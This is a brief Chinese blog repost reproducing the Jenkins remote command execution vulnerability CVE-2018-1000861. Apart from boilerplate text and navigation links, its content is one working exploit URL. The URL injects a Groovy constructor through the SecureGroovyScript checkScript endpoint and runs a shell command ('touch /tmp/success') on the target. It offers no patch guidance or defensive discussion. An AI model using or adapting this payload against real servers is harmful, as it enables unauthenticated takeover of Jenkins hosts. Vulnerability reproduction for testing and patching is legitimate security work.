Jenkins远程命令执行漏洞(CVE-2018-1000861)
生活随笔
收集整理的這篇文章主要介紹了
Jenkins远程命令执行漏洞(CVE-2018-1000861)
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
漏洞復現
只需要訪問以下網址即可執行命令:
http://your-ip:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript ?sandbox=true &value=public class x {public x(){"touch /tmp/success".execute()} }總結
以上是生活随笔為你收集整理的Jenkins远程命令执行漏洞(CVE-2018-1000861)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 22-08-06 西安 尚医通(03)E
- 下一篇: 嵌入式人工智能教学科研平台